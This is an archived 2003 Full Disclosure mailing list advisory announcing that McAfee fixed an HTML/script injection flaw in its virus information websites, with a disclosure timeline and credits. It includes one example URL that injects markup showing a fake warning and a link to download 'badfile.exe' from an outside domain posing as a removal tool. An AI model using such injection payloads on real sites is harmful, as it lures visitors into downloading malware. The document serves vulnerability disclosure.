Full Disclosure mailing list archives

[Update]: Code executing in McAfee's virus information websites fixed

From: Redaktion-Kryptocrew <momolly () kryptocrew de>
Date: Thu, 4 Sep 2003 14:45:48 +0200


Vulnerability:     Code executing in McAfee's virus information websites
Found:             29 Aug 2003
Vendor:            McAfee Security
Vendor notified:   02 Sept 2003
Vendor response:   no
Public release:    03 Sept 2003



We were surfing McAfee's virus information sites and possibilities to inject even
harmful
scripts. We're testing successfully executed remote code using the ADODB
exploit.
McAfee overlooked this fault in their virus Information websites (all
languages!).



[Example]:
http://de.mcafee.com/virusInfo/default.asp?id=helpCenter&hcName=Sobig<br><br><b>if%20you%20recieve%20a%20error%20above%20you%20must</b><br><h3><a%20href=http://www.kryptocrew.de/badfile.exe>download%20this%20removal%20tool!%20NOW!!!</a><br>testing%20your%20saftey...%20%20test



[Update]:
McAfee fixed



Thanks to:
Donnie Werner (exploitlabs.com), Roland Brecht (kryptocrew.de) & Alexander Mueller
(ec-security.com)


Regards
G.P

--
======================================================================

G.P
Online-Redaktion
                  
===============================

Kryptocrew
.: your security advisor team :.           mailto:momolly () kryptocrew de

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Current thread:

[Update]: Code executing in McAfee's virus information websites fixed Redaktion-Kryptocrew (Sep 04)